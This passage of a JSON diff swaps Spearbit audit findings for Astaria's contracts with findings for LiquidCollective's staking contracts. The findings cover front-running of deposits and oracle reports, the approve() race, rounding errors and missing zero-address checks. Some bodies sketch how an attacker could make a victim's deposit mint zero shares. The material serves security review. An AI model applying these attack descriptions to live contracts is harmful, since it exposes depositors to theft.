but that would not appropriate value like lsETH, which would basically be kind of wETH. We think the issue of not being able to transfer your full amount of shares is not as serious as not being able to burn back your shares into lsETH. On the same note, we think it would be beneficial to expose the wlsETH share amount to the end user: function sharesBalanceOf(address _owner) external view returns (uint256 shares) { return BalanceOf.get(_owner); }", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "fileBatch() does requiresAuth for each file separately", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "fileBatch() does a requiresAuth check and then for each element in the input array calls file() which does another requiresAuth check. function fileBatch(File[] calldata files) external requiresAuth { for (uint256 i = 0; i < files.length; i++) { file(files[i]); } } ... function file(File calldata incoming) public requiresAuth { This wastes gas as if the fileBatch()'s requiresAuth pass, file()'s check will pass too.", + "title": "BytesLib.concat can potentailly return results with dirty byte paddings.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "concat does not clean the potential dirty bytes that might have been copied from _postBytes (nor does it clean the padding). The dirty bytes from _postBytes are carried over to the padding for tempBytes.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "_sliceUint can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_sliceUint can be optimized", + "title": "The reportBeacon is prone to front-running attacks by oracle members", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "There could be a situation where the oracle members are segmented into 2 groups A and B , and members of the group A have voted for the report variant Va and the group B for Vb . Also, let's assume these two variants are 1 vote short of quorum. Then either group can try to front-run the other to push their submitted variant to river.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "Use basis points for ratios", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Fee ratios are represented through two state variables for numerator and denominator. Basis point system can be used in its place as it is simpler (denominator always set to 10_000), and gas efficient as denomi- nator is now a constant.", + "title": "Shares distributed to operators suffer from rounding error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "_rewardOperators distribute a portion of the overall shares distributed to operators based on the number of active and funded validators that each operator has. The current number of shares distributed to a validator is calculated by the following code _mintRawShares(operators[idx].feeRecipient, validatorCounts[idx] * rewardsPerActiveValidator); where rewardsPerActiveValidator is calculated as uint256 rewardsPerActiveValidator = _reward / totalActiveValidators; This means that in reality each operator receives validatorCounts[idx] * (_reward / totalActiveValida- tors) shares. Such share calculation suffers from a rounding error caused by division before multiplication.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "No Need to Allocate Unused Variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "LienToken._makePayment() returns two values: (Stack[] memory newStack, uint256 spent), but the second value is never read: (newStack, ) = _makePayment(_loadLienStorageSlot(), stack, amount); Also, if this value is planned to be used in future, it's not a useful value. It is equal to the payment made to the last lien. A more meaningful quantity can be the total payment made to the entire stack. Additional instances noted in Context above.", + "title": "OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Note that limited number of validators (already pushed by op) that have been approved by Alluvial and can be selected to be funded. funded number of validators funded. stopped number of validators exited (so that were funded at some point but for any reason they have exited the staking). The implementation of the function should favor operators that have the highest number of available validators to be funded. Nevertheless functions favor validators that have stopped value near the funded value. Consider the following example: Op at index 0 name op1 active true limit 10 funded 5 stopped 5 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 1) op1 and op2 have 10 validators whitelisted. 2) op1 at time1 get 5 validators funded. 3) op1 at time2 get those 5 validators exited, this mean that op.stopped == 5. In this scenario, those 5 validators would not be used because they are \"blacklisted\". At this point op1 have 5 validators that can be funded. 24 op2 have 10 validators that can be funded. pickNextValidators logic should favor operators that have the higher number of available keys (not funded but approved) to be funded. If we run operatorsRegistry.pickNextValidators(5); the result is this Op at index 0 name op1 active true limit 10 funded 10 stopped 5 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 Op1 gets all the remaining 5 validators funded, the function (from the specification of the logic) should instead have picked Op2. Check the Appendix for a test case to reproduce this issue.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "Cache Values to Save Gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Calls are occurring, same values are computed, or storage variables are being read, multiple times; e.g. CollateralToken.sol#L286-L307 reads the storage variable s.securityHooks[addr] four times. It's better to cache the result in a stack variable to save gas.", + "title": "approve() function can be front-ran resulting in token theft", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The approve() function has a known race condition that can lead to token theft. If a user calls the approve function a second time on a spender that was already allowed, the spender can front-run the transaction and call transferFrom() to transfer the previous value and still receive the authorization to transfer the new value.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "RouterStorage.vaults can be a boolean mapping", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "RouterStorage.vaults is of type mapping(address => address). A key-value is stored in the mapping as: s.vaults[vaultAddr] = msg.sender; However, values in this mapping are only used to compare against address(0): if (_loadRouterSlot().vaults[msg.sender] == address(0)) { ... return _loadRouterSlot().vaults[vault] != address(0); It's better to have vaults as a boolean mapping as the assignment of msg.sender as value doesn't carry a special meaning.", + "title": "Add missing input validation on constructor/initializer/setters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Allowlist.1.sol initAllowlistV1 should require the _admin parameter to be not equal to address(0). This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. allow should check _accounts[i] to be not equal to address(0). Firewall.sol constructor should check that: governor_ != address(0). executor_ != address(0). destination_ != address(0). setGovernor should check that newGovernor != address(0). setExecutor should check that newExecutor != address(0). OperatorsRegistry.1.sol initOperatorsRegistryV1 should require the _admin parameter to be not equal to address(0). This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. addOperator should check: _name to not be an empty string. _operator to not be address(0). _feeRecipi- ent to not be address(0). setOperatorAddress should check that _newOperatorAddress is not address(0). setOperatorFeeRecipientAddress should check that _newOperatorFeeRecipientAddress is not address(0). setOperatorName should check that _newName is not an empty string. Oracle.1.sol initOracleV1 should require the _admin parameter to be not equal to address(0). This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. Consider also adding some min and max limit to the values of _annualAprUpperBound and _relativeLowerBound and be sure that _epochsPerFrame, _slotsPerEpoch, _secondsPerSlot and _genesisTime matches the values expected. addMember should check that _newOracleMember is not address(0). setBeaconBounds: Consider adding min/max value that _annualAprUpperBound and _relativeLowerBound should respect. River.1.sol initRiverV1: _globalFee should follow the same validation done in setGlobalFee. Note that client said that 0 is a valid _- globalFee value \"The revenue redistributuon would be computed off-chain and paid by the treasury in that case. It's still an on-going discussion they're having at Alluvial.\" _operatorRewardsShare should follow the same validation done in setOperatorRewardsShare. Note that client said that 0 is a valid _operatorRewardsShare value \"The revenue redistributuon would be computed off-chain and paid by the treasury in that case. It's still an on-going discussion they're having at Alluvial.\" ConsensusLayerDepositManager.1.sol initConsensusLayerDepositManagerV1: _withdrawalCredentials should not be empty and follow the re- quirements expressed in the following official Consensus Specs document. 26", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "isValidReference() should just take an array element as input", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "stack[position]: isValidRefinance() takes stack array as an argument but only uses stack[0] and function isValidRefinance( ILienToken.Lien calldata newLien, uint8 position, ILienToken.Stack[] calldata stack ) public view returns (bool) { The usage of stack[0] can be replaced with stack[position] as stack[0].lien.collateralId == stack[position].lien.collateralId: if (newLien.collateralId != stack[0].lien.collateralId) { revert InvalidRefinanceCollateral(newLien.collateralId); } To save gas, it can directly take that one element as input.", + "title": "LibOwnable._setAdmin allows setting address(0) as the admin of the contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "While other contracts like RiverAddress (for example) do not allow address(0) to be used as set input parameter, there is no similar check inside LibOwnable._setAdmin. Because of this, contracts that call LibOwnable._setAdmin with address(0) will not revert and functions that should be callable by an admin cannot be called anymore. This is the list of contracts that import and use the LibOwnable library AllowlistV1 OperatorsRegistryV1 OracleV1 RiverV1", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "Functions can be made external", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "If public function is not called from within the contract, it should made external for clarity, and can potentially save gas.", + "title": "OracleV1.getMemberReportStatus returns true for non existing oracles", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "memberIndex will be equal to -1 for non-existing oracles, which will cause the mask to be equal to 0, which will cause the function to return true for non-existing oracles.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "a.mulDivDown(b,1) is equivalent to a*b", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Highlighted code above follow the pattern of a.mulDivDown(b, 1) which is equivalent to a*b.", + "title": "Operators might add the same validator more than once", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Operators can use OperatorsRegistryV1.addValidators to add the same validator more than once. Depositors' funds will be directed to these duplicated addresses, which in turn, will end up having more than 32 eth. This act will damage the capital efficiency of the entire deposit pool and thus will potentially impact the pool's APY.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "Use scratch space for keccak", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "computeId() function computes and returns uint256(keccak256(abi.encodePacked(token, to- kenId))). Since the data being hashed fits within 2 memory slots, scratch space can be used to avoid paying gas cost on memory expansion.", + "title": "OracleManager.setBeaconData possible front running attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The system is designed in a way that depositors receive shares (lsETH) in return for their eth de- posit. A share represents a fraction of the total eth balance of the system in a given time. Investors can claim their staking profits by withdrawing once withdrawals are active in the system. Profits are being pulled from ELFeeRe- cipient to the River contract when the oracle is calling OracleManager.setBeaconData. setBeaconData updates BeaconValidatorBalanceSum which might be increased or decreased (as a result of slashing for instance). Investors have the ability to time their position in two main ways: Investors might time their deposit just before profits are being distributed, thus harvesting profits made by others. Investors might time their withdrawal / sell lsETH on secondary markets just before the loss is realized. By doing this, they will effectively avoid the loss, escaping the intended mechanism of socializing losses.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "Define a named constant for the return value of onFlashAction", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "onFlashAction returns: keccak256(\"FlashAction.onFlashAction\")", + "title": "SharesManager._mintShares - Depositors may receive zero shares due to front-running", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The number of shares minted to a depositor is determined by (_underlyingAssetValue * _total- Supply()) / oldTotalAssetBalance. Potential attackers can spot a call to UserDepositManagerV1._deposit and front-run it with a transaction that sends wei to the contract (by self-destructing another contract and sending the funds to it), causing the victim to receive fewer shares than what he expected. More specifically, In case old- TotalAssetBalance() is greater than _underlyingAssetValue * _totalSupply(), then the number of shares the depositor receives will be 0, although _underlyingAssetValue will be still pulled from the depositors balance. An attacker with access to enough liquidity and to the mem-pool data can spot a call to UserDepositManagerV1._- deposit and front-run it by sending at least totalSupplyBefore * (_underlyingAssetValue - 1) + 1 wei to the contract . This way, the victim will get 0 shares, but _underlyingAssetValue will still be pulled from its account balance. In this case, the attacker does not necessarily have to be a whitelisted user, and it is important to mention that the funds that were sent by him can not be directly claimed back, rather, they will increase the price of the share. The attack vector mentioned above is the general front runner case, the most profitable attack vector will be the case where the attacker is able to determine the share price (for instance if the attacker mints the first share). In this scenario, the attacker will need to send at least attackerShares * (_underlyingAssetValue - 1) + 1 to the contract, (attackerShares is completely controlled by the attacker, and thus can be 1). In our case, depositors are whitelisted, which makes this attack harder for a foreign attacker.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "Define a named constant for permit typehash in ERC20-cloned", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In permit, the following type hash has been used: keccak256( \"Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)\" )", + "title": "Orphaned (index, values) in SlotOperator storage slots in operatorsRegistry", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "If !opExists corresponds to an operator which has OperatorResolution.active set to false, the line below can leave some orphaned (index, values) in SlotOperator storage slots: _setOperatorIndex(name, newValue.active, r.value.length - 1);", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Low Risk" ] }, { - "title": "Unused struct, enum and storage fields can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The struct, enum and storage fields in this context have not been used in the project.", + "title": "OperatorsRegistry.setOperatorName Possible front running attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "1. setOperatorName reverts for an already used name, which means that a call to setOperatorName might be front-ran using the same name. The front-runner can launch the same attack again and again thus causing a DoS for the original caller. 2. setOperatorName can be called either by an operator (to edit his own name) or by the admin. setOpera- torName will revert for an already used _newName. setOperatorName caller might be front-ran by the identical transaction transmitted by someone else, which will lead to failure for his transaction, where in practice this failure is a \"false failure\" since the desired change was already made.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Low" ] }, { - "title": "WPStorage.expected's comment can be made more accurate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In WPStorage's definition we have: uint88 expected; // Expected value of auctioned NFTs. yIntercept (virtual assets) of a PublicVault are ,! not modified on liquidation, only once an auction is completed. The comment for expected is not exactly accurate. The accumulated value in expected is the sum of all auctioned NFTs's amountOwed when (the timestamp) the liquidate function gets called. Whereas the NFTs get auctioned starting from their first stack's element's liquidationInitialAsk to 1_000 wei", + "title": "Prevent users from burning token via lsETH/wlsETH transfer or transferFrom functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of both lsETH (SharesManager component of River contract) and wlsETH allow the user to \"burn\" tokens, sending them directly to the address(0) via the transfer and transferFrom function. By doing that, it would bypass the logic of the existing burn functions present right now (or in the future when withdrawals will be enabled in River) in the protocol.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Low Risk" ] }, { - "title": "Leave comment that in WithdrawProxy.claim() the calculation of balance cannot underflow", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There is this following line in claim() where balance is initialised: uint256 balance = ERC20(asset()).balanceOf(address(this)) - s.withdrawReserveReceived; With the current PublicVault implementation of IPublicVault, this cannot underflow since the increase in with- drawReserveReceived (using increaseWithdrawReserveReceived) is synced with increasing the asset balance by the same amount.", + "title": "In addOperator when emitting an event use stack variables instead of reading from memory again", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "In OperatorsRegistry's addOperator function when emitting the AddedOperator event we read from memory all the event parameters except operatorIndex. emit AddedOperator(operatorIndex, newOperator.name, newOperator.operator, newOperator.feeRecipient); We can avoid reading from memory to save gas.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "Shared logic in withdraw and redeem functions of WithdrawProxy can be turned into a shared modifier", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "withdraw and redeem both start with the following lines: WPStorage storage s = _loadSlot(); // If auction funds have been collected to the WithdrawProxy // but the PublicVault hasn't claimed its share, too much money will be sent to LPs if (s.finalAuctionEnd != 0) { // if finalAuctionEnd is 0, no auctions were added revert InvalidState(InvalidStates.NOT_CLAIMED); } Since they have this shared logic at the beginning of their body, we can consolidate the logic into a modifier.", + "title": "Rewrite pad64 so that it doesn't use BytesLib.concat and BytesLib.slice to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "We can avoid using the BytesLib.concat and BytesLib.slice and write pad64 mostly in assembly. Since the current implementation adds more memory expansion than needed (also not highly optimized).", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "StrategyDetails version can only be used in custom implementation of IStrategyValidator, requires documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "StrategyDetails.version is never used in the current implementations of the validators. If the intention is to avoid replays across different versions of Astaria, we should add a check for it in commit- ment validation functions. A custom implementation of IStrategyValidator can make use of this value, but this needs documentation as to exactly what it refers to.", + "title": "Cache r.value.length used in a loop condition to avoid reading from the storage multiple times.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "In a loop like the one below, consider caching r.value.length value to avoid reading from storage on every round of the loop. for (uint256 idx = 0; idx < r.value.length;) {", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "Define helper functions to tag different pieces of cloned data for ClearingHouse", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_getArgAddress(0) and _getArgUint256(21) are used as the ROUTER() and COLLATERAL_ID() in the fallback implementation for ClearingHouse was Clone derived contract.", + "title": "Rewrite the for loop in ValidatorKeys.sol::getKeys to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "A new modifier onlyVault() can be defined for WithdrawProxy to consolidate logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The following require statement has been used in multiple functions including increaseWith- drawReserveReceived, drain, setWithdrawRatio and handleNewLiquidation. require(msg.sender == VAULT(), \"only vault can call\");", + "title": "Operators.get in _getNextValidatorsFromActiveOperators can be replaced by Opera- tors.getByIndex to avoid extra operations/gas.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Operators.get in _getNextValidatorsFromActiveOperators performs multiple checks that have been done before when Operators.getAllFundable() was called. This includes finding the index, and checking if OperatorResolution.active is set. These are all not necessary.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "Inconsistant pragma versions and floating pragma versions can be avoided", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Most contracts in the project use pragma solidity 0.8.17, but there are other variants as well: 69 pragma solidity ^0.8.16; pragma solidity ^0.8.16; pragma solidity ^0.8.16; // src/Interfaces/IAstariaVaultBase.sol // src/Interfaces/IERC4626Base.sol // src/Interfaces/ITokenBase.sol pragma solidity ^0.8.15; // src/Interfaces/ICollateralToken.sol pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; // src/Interfaces/IERC20.sol // src/Interfaces/IERC165.sol // src/Interfaces/IERC1155.sol // src/Interfaces/IERC1155Receiver.sol // src/Interfaces/IERC721Receiver.sol // src/utils/Math.sol pragma solidity >=0.8.0; pragma solidity >=0.8.0; // src/Interfaces/IERC721.sol // src/utils/MerkleProofLib.sol And they all have floating version pragmas. In hardhat.config.ts, solidity: \"0.8.13\" is used. In .prettierrc settings we have \"compiler\": \"0.8.17\" In .solhint.json we have \"compiler-version\": [\"error\", \"0.8.0\"] foundry.toml does not have a solc setting", + "title": "Avoid unnecessary equality checks with true in if statements", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Statements of the type if( condition == true) can be replaced with if(condition). The extra comparison with true is redundant.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "IBeacon is missing a compiler version pragma", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "IBeacon is missing a compiler version pragma.", + "title": "Rewrite OperatorRegistry.getOperatorDetails to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "In getOperatorDetails the 1st line is: _index = Operators.indexOf(_name); Since we already have the _index from this line we can use that along with getByIndex to retrieve the _opera- torAddress. This would reduce the gas cost significantly, since Operators.get(_name) calls Operators._getOp- eratorIndex(name) to find the _index again. testExecutorCanSetOperatorLimit() (gas: -1086 (-0.001%)) testGovernorCanSetOperatorLimit() (gas: -1086 (-0.001%)) testUserDepositsForAnotherUser() (gas: -2172 (-0.001%)) testDeniedUser() (gas: -2172 (-0.001%)) testELFeeRecipientPullFunds() (gas: -2172 (-0.001%)) testUserDepositsUnconventionalDeposits() (gas: -2172 (-0.001%)) testUserDeposits() (gas: -2172 (-0.001%)) testNoELFeeRecipient() (gas: -2172 (-0.001%)) testUserDepositsTenPercentFee() (gas: -2172 (-0.001%)) testUserDepositsFullAllowance() (gas: -2172 (-0.001%)) testValidatorsPenaltiesEqualToExecLayerFees() (gas: -2172 (-0.001%)) testValidatorsPenalties() (gas: -2172 (-0.001%)) testUserDepositsOperatorWithStoppedValiadtors() (gas: -3258 (-0.002%)) testMakingFunctionGovernorOnly() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorLimit() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorStatus() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorStoppedValidatorCount() (gas: -1086 (-0.005%)) testExecutorCanSetOperatorStoppedValidatorCount() (gas: -1086 (-0.006%)) testGovernorCanSetOperatorStatus() (gas: -1086 (-0.006%)) testGovernorCanSetOperatorStoppedValidatorCount() (gas: -1086 (-0.006%)) testGovernorCanAddOperator() (gas: -1086 (-0.006%)) testExecutorCanSetOperatorStatus() (gas: -1086 (-0.006%)) Overall gas change: -36924 (-0.062%) Also note, when the operator is not OperatorResolution.active, _index becomes -1 in both cases. With the change suggested if _index is -1, uint256(_index) == type(uint256).max which would cause getByIndex to revert with OperatorNotFoundAtIndex(index). But with the current code, it will revert with an index out-of-bound type of error. _operatorAddress = Operators.getByIndex(uint256(_index)).operator;", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "zone and zoneHash are not required for fully open Seaport orders", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "As per Seaport's documentation,zone and zoneHash are not required for PUBLIC orders: The zone of the order is an optional secondary account attached to the order with two additional privi- leges: The zone may cancel orders where it is named as the zone by calling cancel. (Note that offerers can also cancel their own orders, either individually or for all orders signed with their current counter at once by calling incrementCounter). \"Restricted\" orders (as specified by the order type) must either be executed by the zone or the offerer, or must be approved as indicated by a call to an isValidOrder or isValidOrderIncludingEx- traData view function on the zone. 70 This order isn't \"Restricted\", and there is no way to cancel a Seaport order once created from this contract.", + "title": "Rewrite/simplify OracleV1.isMember to save gas.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "OracleV1.isMember can be simplified to save gas.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "Inconsistent treatment of delegate setting", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Private vaults include delegate in the allow list when deployed through the Router. Public vaults do not. The VaultImplementation, when mutating a delegate, sets them on allow list.", + "title": "Cache beaconSpec.secondsPerSlot * beaconSpec.slotsPerEpoch multiplication in to save gas.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The calculation for _startTime and _endTime uses more multiplication than is necessary.", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "AstariaRouter does not adhere to EIP1967 spec", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The Router serves as an implementation Beacon for proxy contracts, however, does not adhere to the EIP1967 spec.", + "title": "_rewardOperators could save gas by skipping operators with no active and funded validators", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "_rewardOperators is the River function that distribute the earning rewards to each active operator based on the amount of active validators. The function iterate over the list of active operators returned by OperatorsRegistryV1.listActiveOperators calculating the total amount of active and funded validators (funded-stopped) and the number of active and funded validators (funded-stopped) for each operator. Because of current code, the final temporary array validatorCounts could have some item that contains 0 if the operator in the index position had no more active validators. This mean that: 1) gas has been wasted during the loop 2) gas will be wasted in the second loop, distributing 0 shares to an operator without active and funded valida- tors 3) _mintRawShares will be executed without minting any shares but emitting a Transfer event", "labels": [ "Spearbit", - "Astaria", - "Severity: Informational" + "LiquidCollective", + "Severity: Gas Optimization" ] }, { - "title": "Receiver of bought out lien must be approved by msg.sender", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The buyoutLien function requires that either the receiver of the lien is msg.sender or is an address approved by msg.sender: if (msg.sender != params.encumber.receiver) { require( _loadERC721Slot().isApprovedForAll[msg.sender][params.encumber.receiver] ); } This check seems unnecessary and in some cases will block users from buying out liens as intended.", + "title": "Consider adding a strict check to prevent Oracle admin to add more than 256 members", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "At the time of writing this issue in the latest commit at 030b52feb5af2dd2ad23da0d512c5b0e55eb8259, in the natspec docs of OracleMembers there is a @dev comment that says @dev There can only be up to 256 oracle members. This is due to how report statuses are stored in Reports Positions If we look at ReportsPositions.sol the natspec docs explains that Each bit in the stored uint256 value tells if the member at a given index has reported But both Oracle.addMember and OracleMembers.push do not prevent the admin to add more than 256 items to the list of oracle members. If we look at the result of the test (located in Appendix), we can see that: It's possible to add more than 256 oracle members. The result of oracle.getMemberReportStatus(oracleMember257) return true even if the oracle member has not reported yet. Because of that, oracle.reportConsensusLayerData (executed by oracleMember257) reverts correctly. If we remove a member from the list (for example oracle member with index 1) the oracleMember257 it will be able to vote because will be swapped with the removed member and at oracle.getMemberReportStatus(oracleMember257) return false. this point 45", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "A new modifer onlyLienToken() can be defined to refactor logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The following require statement has been used in multiple locations in PublicVault: require(msg.sender == address(LIEN_TOKEN())); Locations used: beforePayment afterPayment handleBuyoutLien updateAfterLiquidationPayment updateVaultAfterLiquidation", + "title": "ApprovalsPerOwner.set does not check if owner or spender is address(0).", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "When ApprovalsPerOwner value is set for an owner and a spender, the addresses of the owner and the spender are not checked against address(0).", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { 